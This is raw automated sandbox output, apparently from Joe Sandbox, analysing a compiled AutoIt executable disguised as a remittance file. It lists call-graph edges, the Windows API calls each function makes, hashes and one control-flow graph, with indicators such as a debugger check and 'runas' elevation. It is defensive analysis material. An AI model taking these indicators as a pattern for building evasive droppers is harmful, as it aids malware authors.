40e270 VariantClear ctype 87984->88457 87985->87976 87986 40a534 87986->87994 88459 40e270 VariantClear ctype 87986->88459 87987->87996 87989->87994 87990->87981 87990->87986 87991 42ad28 87997 42ad4e VariantClear 87991->87997 88002 40a583 ctype 87991->88002 87994->87991 87995 40a571 87994->87995 87995->88002 88460 40e270 VariantClear ctype 87995->88460 87996->87974 87996->87977 87997->88002 87999 40a650 ctype 87999->86839 88000 42ae0e VariantClear 88000->88002 88002->87999 88002->88000 88461 40e270 VariantClear ctype 88002->88461 88003->86839 88004->86787 88005->86792 88006->86839 88007->86839 88008->86839 88009->86839 88010->86844 88011->86844 88012->86844 88013->86844 88014->86844 88015->86844 88016->86844 88018 403cdf 88017->88018 88019 408f40 VariantClear 88018->88019 88020 403ce7 88019->88020 88020->86833 88021->86844 88022->86844 88023->86839 88024->86784 88026 408e88 88025->88026 88028 408e94 88025->88028 88027 408f40 VariantClear 88026->88027 88027->88028 88029 45340c 85 API calls 88028->88029 88029->87748 88030->87752 88031->87754 88032->87756 88033->87740 88034->87785 88035->87768 88036->87765 88037->87786 88038->87787 88039->87785 88041 40a7a6 88040->88041 88042 40ae8c 88040->88042 88044 4115d7 52 API calls 88041->88044 88083 41130a 51 API calls __cinit 88042->88083 88064 40a7c6 ctype _memmove 88044->88064 88045 40a86d 88046 40a878 ctype 88045->88046 88047 40abd1 88045->88047 88088 45e737 90 API calls 3 library calls 88047->88088 88048 401b10 52 API calls 88048->88064 88050 408e80 VariantClear 88050->88064 88051 42b791 VariantClear 88051->88064 88052 42ba2d VariantClear 88052->88064 88054 42b459 VariantClear 88054->88064 88057 42b6f6 VariantClear 88057->88064 88058 40bc10 53 API calls 88058->88064 88059 408cc0 187 API calls 88059->88064 88060 42bc5b 88060->87786 88061 40e270 VariantClear 88061->88064 88062 4115d7 52 API calls 88062->88064 88063 42bbf5 88089 45e737 90 API calls 3 library calls 88063->88089 88064->88045 88064->88047 88064->88048 88064->88050 88064->88051 88064->88052 88064->88054 88064->88057 88064->88058 88064->88059 88064->88061 88064->88062 88064->88063 88065 4115d7 52 API calls 88064->88065 88066 40b5f0 89 API calls 88064->88066 88068 408f40 VariantClear 88064->88068 88071 42bb6a 88064->88071 88075 42bc37 88064->88075 88080 4530c9 VariantClear 88064->88080 88084 45308a 53 API calls 88064->88084 88085 470870 52 API calls 88064->88085 88086 457f66 87 API calls __write_nolock 88064->88086 88087 472f47 127 API calls 88064->88087 88069 42b5b3 VariantInit VariantCopy 88065->88069 88066->88064 88068->88064 88069->88064 88072 42b5d7 VariantClear 88069->88072 88091 44b92d VariantClear 88071->88091 88072->88064 88090 45e737 90 API calls 3 library calls 88075->88090 88078 42bc48 88078->88071 88080->88064 88081->87773 88082->87776 88083->88064 88084->88064 88085->88064 88086->88064 88087->88064 88088->88071 88089->88071 88090->88078 88091->88060 88092->87794 88093->87797 88094->87810 88095->87815 88096->87802 88097->87817 88098->87848 88099->87817 88100->87850 88101->87817 88102->87850 88103->87831 88104->87850 88105->87834 88106->87850 88107->87850 88108->87830 88110 4289d2 88109->88110 88111 408db3 88109->88111 88139 45e737 90 API calls 3 library calls 88110->88139 88137 40bec0 90 API calls 88111->88137 88114 4289e5 88140 45e737 90 API calls 3 library calls 88114->88140 88116 428a05 88118 408f40 VariantClear 88116->88118 88124 408e5a 88118->88124 88119 40a780 194 API calls 88122 408dc9 88119->88122 88120 408e64 88121 408f40 VariantClear 88120->88121 88121->88124 88122->88114 88122->88116 88122->88119 88122->88120 88123 408f40 VariantClear 88122->88123 88122->88124 88138 40ba10 52 API calls 2 library calls 88122->88138 88123->88122 88124->87856 88126 408f40 VariantClear 88125->88126 88127 403d20 88126->88127 88128 403cd0 VariantClear 88127->88128 88129 403d4d 88128->88129 88141 46e91c 88129->88141 88144 45e17d 88129->88144 88154 4755ad 88129->88154 88157 467897 88129->88157 88130 403d76 88130->87853 88130->87864 88135->87853 88136->87855 88137->88122 88138->88122 88139->88114 88140->88116 88201 46e785 88141->88201 88143 46e92f 88143->88130 88145 45e198 88144->88145 88146 45e19c 88145->88146 88147 45e1b8 88145->88147 88148 408f40 VariantClear 88146->88148 88149 45e1cc 88147->88149 88150 45e1db FindClose 88147->88150 88151 45e1a4 88148->88151 88152 45e1d9 ctype 88149->88152 88153 44ae3e CloseHandle 88149->88153 88150->88152 88151->88130 88152->88130 88153->88152 88327 475077 88154->88327 88156 4755c0 88156->88130 88158 4678bb 88157->88158 88190 467954 88158->88190 88428 45340c 85 API calls 88158->88428 88159 4115d7 52 API calls 88160 467989 88159->88160 88162 467995 88160->88162 88432 40da60 53 API calls 88160->88432 88166 4533eb 85 API calls 88162->88166 88163 4678f6 88165 413a0e __wsplitpath 46 API calls 88163->88165 88167 4678fc 88165->88167 88168 4679b7 88166->88168 88169 401b10 52 API calls 88167->88169 88170 40de40 60 API calls 88168->88170 88171 46790c 88169->88171 88172 4679c3 88170->88172 88429 40d200 52 API calls 2 library calls 88171->88429 88174 4679c7 GetLastError 88172->88174 88175 467a05 88172->88175 88177 403cd0 VariantClear 88174->88177 88178 467a2c 88175->88178 88179 467a4b 88175->88179 88176 467917 88176->88190 88430 4339fa GetFileAttributesW FindFirstFileW FindClose 88176->88430 88180 4679dc 88177->88180 88183 4115d7 52 API calls 88178->88183 88184 4115d7 52 API calls 88179->88184 88185 4679e6 88180->88185 88187 44ae3e CloseHandle 88180->88187 88182 467928 88188 46792f 88182->88188 88182->88190 88192 467a31 88183->88192 88186 467a49 88184->88186 88189 408f40 VariantClear 88185->88189 88196 408f40 VariantClear 88186->88196 88187->88185 88431 4335cd 56 API calls 3 library calls 88188->88431 88194 4679ed 88189->88194 88190->88159 88191 467964 88190->88191 88191->88130 88433 436299 52 API calls 2 library calls 88192->88433 88194->88130 88198 467a88 88196->88198 88197 467939 88197->88190 88199 408f40 VariantClear 88197->88199 88198->88130 88200 467947 88199->88200 88200->88190 88202 46e7a2 88201->88202 88203 4115d7 52 API calls 88202->88203 88205 46e802 88202->88205 88204 46e7ad 88203->88204 88207 46e7b9 88204->88207 88249 40da60 53 API calls 88204->88249 88206 46e7e5 88205->88206 88214 46e82f 88205->88214 88209 408f40 VariantClear 88206->88209 88250 4533eb 88207->88250 88211 46e7ea 88209->88211 88211->88143 88213 46e8b5 88242 4680ed 88213->88242 88214->88213 88216 46e845 88214->88216 88220 4533eb 85 API calls 88216->88220 88219 46e8bb 88246 443fbe 88219->88246 88227 46e84b 88220->88227 88221 46e7db 88221->88206 88222 46e87a 88269 4689f4 59 API calls 88222->88269 88226 46e883 88230 4013c0 52 API calls 88226->88230 88227->88222 88227->88226 88228 46e881 88236 46e911 88228->88236 88272 40da20 88228->88272 88231 46e88f 88230->88231 88233 40e0a0 52 API calls 88231->88233 88232 408f40 VariantClear 88232->88228 88234 46e899 88233->88234 88270 40d200 52 API calls 2 library calls 88234->88270 88236->88143 88237 46e8a5 88271 4689f4 59 API calls 88237->88271 88240 46e903 88241 44ae3e CloseHandle 88240->88241 88241->88236 88243 468100 88242->88243 88244 4680fa 88242->88244 88243->88219 88276 467ac4 88244->88276 88299 443e36 88246->88299 88248 443fd3 88248->88228 88248->88232 88249->88207 88251 453404 88250->88251 88252 4533f8 88250->88252 88254 40de40 88251->88254 88252->88251 88306 4531b1 85 API calls 5 library calls 88252->88306 88255 40da20 CloseHandle 88254->88255 88256 40de4e 88255->88256 88307 40f110 88256->88307 88259 4264fa 88261 40de84 88316 40e080 SetFilePointerEx SetFilePointerEx 88261->88316 88263 40de8b 88317 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88263->88317 88265 40de90 88265->88214 88265->88221 88269->88228 88270->88237 88271->88228 88273 40da37 88272->88273 88274 40da29 88272->88274 88273->88274 88275 40da3c CloseHandle 88273->88275 88274->88240 88275->88240 88277 467adc 88276->88277 88289 467bb8 88276->88289 88278 467c1d 88277->88278 88279 467c16 88277->88279 88280 467b90 88277->88280 88291 467aed 88277->88291 88281 4115d7 52 API calls 88278->88281 88298 40e270 VariantClear ctype 88279->88298 88283 4115d7 52 API calls 88280->88283 88284 467b75 _memmove 88281->88284 88283->88284 88287 4115d7 52 API calls 88284->88287 88285 467b28 ctype 88285->88278 88285->88284 88286 467b55 88285->88286 88288 4115d7 52 API calls 88286->88288 88287->88289 88290 467b5b 88288->88290 88289->88243 88296 442ee0 52 API calls 88290->88296 88291->88285 88293 4115d7 52 API calls 88291->88293 88293->88285 88294 467b6b 88297 45f645 54 API calls ctype 88294->88297 88296->88294 88297->88284 88298->88278 88302 443e19 88299->88302 88303 443e26 88302->88303 88304 443e32 WriteFile 88302->88304 88305 443db4 SetFilePointerEx SetFilePointerEx 88303->88305 88304->88248 88305->88304 88306->88251 88308 40f125 CreateFileW 88307->88308 88309 42630c 88307->88309 88311 40de74 88308->88311 88310 426311 CreateFileW 88309->88310 88309->88311 88310->88311 88312 426337 88310->88312 88311->88259 88315 40dea0 55 API calls ctype 88311->88315 88318 40df90 SetFilePointerEx SetFilePointerEx 88312->88318 88314 426342 88314->88311 88315->88261 88316->88263 88317->88265 88318->88314 88328 4533eb 85 API calls 88327->88328 88329 4750b8 88328->88329 88330 4750ee 88329->88330 88331 475129 88329->88331 88333 408f40 VariantClear 88330->88333 88380 4646e0 88331->88380 88338 4750f5 88333->88338 88334 47515e 88335 475162 88334->88335 88373 47518e 88334->88373 88336 408f40 VariantClear 88335->88336 88367 475169 88336->88367 88337 475357 88339 475365 88337->88339 88340 4754ea 88337->88340 88338->88156 88414 44b3ac 57 API calls 88339->88414 88420 464812 92 API calls 88340->88420 88344 4754fc 88345 475374 88344->88345 88347 475508 88344->88347 88393 430d31 88345->88393 88346 4533eb 85 API calls 88346->88373 88348 408f40 VariantClear 88347->88348 88351 47550f 88348->88351 88351->88367 88352 475388 88355 475480 88357 408f40 VariantClear 88355->88357 88357->88367 88365 4754b5 88366 408f40 VariantClear 88365->88366 88366->88367 88367->88156 88373->88337 88373->88346 88373->88355 88373->88365 88373->88373 88412 436299 52 API calls 2 library calls 88373->88412 88413 463ad5 64 API calls __wcsicoll 88373->88413 88423 4536f7 53 API calls 88380->88423 88382 4646fc 88424 4426cd 59 API calls _wcslen 88382->88424 88384 464711 88386 40bc70 52 API calls 88384->88386 88392 46474b 88384->88392 88387 46472c 88386->88387 88425 461465 52 API calls _memmove 88387->88425 88389 464741 88390 40c600 52 API calls 88389->88390 88390->88392 88391 464793 88391->88334 88392->88391 88426 463ad5 64 API calls __wcsicoll 88392->88426 88394 430db2 88393->88394 88395 430d54 88393->88395 88394->88352 88396 4115d7 52 API calls 88395->88396 88412->88373 88413->88373 88414->88345 88420->88344 88423->88382 88424->88384 88425->88389 88426->88391 88428->88163 88429->88176 88430->88182 88431->88197 88432->88162 88433->88186 88434->87872 88435->87970 88436->87888 88437->87921 88438->87999 88439->87921 88440->87921 88441->87904 88442->87933 88443->87900 88444->87903 88445->87906 88446->87969 88447->87969 88448->87969 88449->87925 88450->87945 88451->87941 88452->87956 88453->87976 88454->87976 88455->87970 88456->87983 88457->87996 88458->87990 88459->87994 88460->88002 88461->88002 88462->87945 88463->87893 88464 42d154 88468 480a8d 88464->88468 88466 42d161 88467 480a8d 194 API calls 88466->88467 88467->88466 88469 480ae4 88468->88469 88470 480b26 88468->88470 88471 480aeb 88469->88471 88472 480b15 88469->88472 88473 40bc70 52 API calls 88470->88473 88474 480aee 88471->88474 88475 480b04 88471->88475 88501 4805bf 194 API calls 88472->88501 88497 480b2e 88473->88497 88474->88470 88477 480af3 88474->88477 88500 47fea2 194 API calls __itow_s 88475->88500 88499 47f135 194 API calls 88477->88499 88479 40e0a0 52 API calls 88479->88497 88482 408f40 VariantClear 88484 481156 88482->88484 88483 480aff 88483->88482 88485 408f40 VariantClear 88484->88485 88486 48115e 88485->88486 88486->88466 88487 480ff5 88507 45e737 90 API calls 3 library calls 88487->88507 88488 40e710 53 API calls 88488->88497 88489 401980 53 API calls 88489->88497 88491 40c2c0 52 API calls 88491->88497 88492 40a780 194 API calls 88492->88497 88494 408e80 VariantClear 88494->88497 88497->88479 88497->88483 88497->88487 88497->88488 88497->88489 88497->88491 88497->88492 88497->88494 88502 45377f 52 API calls 88497->88502 88503 45e951 53 API calls 88497->88503 88504 40e830 53 API calls 88497->88504 88505 47925f 53 API calls 88497->88505 88506 47fcff 194 API calls 88497->88506 88499->88483 88500->88483 88501->88483 88502->88497 88503->88497 88504->88497 88505->88497 88506->88497 88507->88483 88508 42b14b 88515 40bc10 88508->88515 88510 42b159 88511 4096a0 331 API calls 88510->88511 88512 42b177 88511->88512 88526 44b92d VariantClear 88512->88526 88514 42bc5b 88516 40bc24 88515->88516 88517 40bc17 88515->88517 88519 40bc2a 88516->88519 88520 40bc3c 88516->88520 88518 408e80 VariantClear 88517->88518 88521 40bc1f 88518->88521 88522 408e80 VariantClear 88519->88522 88523 4115d7 52 API calls 88520->88523 88521->88510 88524 40bc33 88522->88524 88525 40bc43 88523->88525 88524->88510 88525->88510 88526->88514 88527 425b2b 88532 40f000 88527->88532 88531 425b3a 88533 4115d7 52 API calls 88532->88533 88534 40f007 88533->88534 88535 4276ea 88534->88535 88541 40f030 88534->88541 88540 41130a 51 API calls __cinit 88540->88531 88542 40f039 88541->88542 88543 40f01a 88541->88543 88571 41130a 51 API calls __cinit 88542->88571 88545 40e500 88543->88545 88546 40bc70 52 API calls 88545->88546 88547 40e515 GetVersionExW 88546->88547 88548 402160 52 API calls 88547->88548 88549 40e557 88548->88549 88572 40e660 88549->88572 88555 427674 88558 4276c6 GetSystemInfo 88555->88558 88557 40e5cd GetCurrentProcess 88593 40ef20 LoadLibraryA GetProcAddress 88557->88593 88560 4276d5 GetSystemInfo 88558->88560 88562 40e5e0 88562->88560 88586 40efd0 88562->88586 88564 40e629 88590 40ef90 88564->88590 88567 40e641 FreeLibrary 88568 40e644 88567->88568 88569 40e653 FreeLibrary 88568->88569 88570 40e656 88568->88570 88569->88570 88570->88540 88571->88543 88573 40e667 88572->88573 88574 42761d 88573->88574 88575 40c600 52 API calls 88573->88575 88576 40e55c 88575->88576 88577 40e680 88576->88577 88578 40e687 88577->88578 88579 427616 88578->88579 88580 40c600 52 API calls 88578->88580 88581 40e566 88580->88581 88581->88555 88582 40ef60 88581->88582 88583 40e5c8 88582->88583 88584 40ef66 LoadLibraryA 88582->88584 88583->88557 88583->88562 88584->88583 88585 40ef77 GetProcAddress 88584->88585 88585->88583 88587 40e620 88586->88587 88588 40efd6 LoadLibraryA 88586->88588 88587->88558 88587->88564 88588->88587 88589 40efe7 GetProcAddress 88588->88589 88589->88587 88594 40efb0 LoadLibraryA GetProcAddress 88590->88594 88592 40e632 GetNativeSystemInfo 88592->88567 88592->88568 88593->88562 88594->88592 88595 425b5e 88600 40c7f0 88595->88600 88599 425b6d 88635 40db10 52 API calls 88600->88635 88602 40c82a 88636 410ab0 6 API calls 88602->88636 88604 40c86d 88605 40bc70 52 API calls 88604->88605 88606 40c877 88605->88606 88607 40bc70 52 API calls 88606->88607 88608 40c881 88607->88608 88609 40bc70 52 API calls 88608->88609 88610 40c88b 88609->88610 88611 40bc70 52 API calls 88610->88611 88612 40c8d1 88611->88612 88613 40bc70 52 API calls 88612->88613 88614 40c991 88613->88614 88637 40d2c0 52 API calls 88614->88637 88616 40c99b 88638 40d0d0 53 API calls 88616->88638 88618 40c9c1 88619 40bc70 52 API calls 88618->88619 88620 40c9cb 88619->88620 88639 40e310 53 API calls 88620->88639 88622 40ca28 88623 408f40 VariantClear 88622->88623 88624 40ca30 88623->88624 88625 408f40 VariantClear 88624->88625 88626 40ca38 GetStdHandle 88625->88626 88627 429630 88626->88627 88628 40ca87 88626->88628 88627->88628 88629 429639 88627->88629 88634 41130a 51 API calls __cinit 88628->88634 88640 4432c0 57 API calls 88629->88640 88631 429641 88641 44b6ab CreateThread 88631->88641 88633 42964f CloseHandle 88633->88628 88634->88599 88635->88602 88636->88604 88637->88616 88638->88618 88639->88622 88640->88631 88641->88633 88642 44b5cb 58 API calls 88641->88642 88643 3ec4820 88657 3ec2470 88643->88657 88645 3ec48b8 88660 3ec4710 88645->88660 88663 3ec5900 GetPEB 88657->88663 88659 3ec2afb 88659->88645 88661 3ec4719 Sleep 88660->88661 88662 3ec4727 88661->88662 88664 3ec592a 88663->88664 88664->88659 88665 425b6f 88670 40dc90 88665->88670 88669 425b7e 88671 40bc70 52 API calls 88670->88671 88672 40dd03 88671->88672 88679 40f210 88672->88679 88674 426a97 88676 40dd96 88676->88674 88677 40ddb7 88676->88677 88682 40dc00 52 API calls 2 library calls 88676->88682 88678 41130a 51 API calls __cinit 88677->88678 88678->88669 88683 40f250 RegOpenKeyExW 88679->88683 88681 40f230 88681->88676 88682->88676 88684 425e17 88683->88684 88685 40f275 RegQueryValueExW 88683->88685 88684->88681 88686 40f2c3 RegCloseKey 88685->88686 88687 40f298 88685->88687 88686->88681 88688 40f2a9 RegCloseKey 88687->88688 88689 425e1d 88687->88689 88688->88681
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 004096C1
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • _memmove.LIBCMT ref: 0040970C
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                      • _memmove.LIBCMT ref: 00409D96
                                                                      • _memmove.LIBCMT ref: 0040A6C4
                                                                      • _memmove.LIBCMT ref: 004297E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                      • String ID:
                                                                      • API String ID: 2383988440-0
                                                                      • Opcode ID: 0c7f704c1111840706a6f5d41559473282fc5ae19e9abcecf6c32e7dc2e8fb44
                                                                      • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                      • Opcode Fuzzy Hash: 0c7f704c1111840706a6f5d41559473282fc5ae19e9abcecf6c32e7dc2e8fb44
                                                                      • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                        • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,00000104,?), ref: 00401F4C
                                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                        • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                        • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                      • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                      • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                        • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                      • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                      • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                        • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                        • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                        • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                        • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                        • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                        • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                        • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                        • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                      • String ID: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                      • API String ID: 2495805114-4081437977
                                                                      • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                      • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                      • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                      • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1920 427693-427696 1915->1920 1921 427688-427691 1915->1921 1919 4276b4-4276be 1916->1919 1922 427625-427629 1917->1922 1923 40e59c-40e59f 1917->1923 1935 40e5ec-40e60c 1918->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1936 1937 4276c6-4276ca GetSystemInfo 1919->1937 1920->1919 1927 427698-4276a8 1920->1927 1921->1919 1929 427636-427640 1922->1929 1930 42762b-427631 1922->1930 1925 40e5a5-40e5ae 1923->1925 1926 427654-427657 1923->1926 1931 40e5b4 1925->1931 1932 427645-42764f 1925->1932 1926->1918 1938 42765d-42766f 1926->1938 1933 4276b0 1927->1933 1934 4276aa-4276ae 1927->1934 1929->1918 1930->1918 1931->1918 1932->1918 1933->1919 1934->1919 1940 40e612-40e623 call 40efd0 1935->1940 1941 4276d5-4276df GetSystemInfo 1935->1941 1936->1935 1948 40e5e8 1936->1948 1937->1941 1938->1918 1940->1937 1945 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1945 1950 40e641-40e642 FreeLibrary 1945->1950 1951 40e644-40e651 1945->1951 1948->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                      • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                      • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                      • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                      • String ID: 0SH
                                                                      • API String ID: 3363477735-851180471
                                                                      • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                      • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                      • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                      • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                      APIs
                                                                      • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: IsThemeActive$uxtheme.dll
                                                                      • API String ID: 2574300362-3542929980
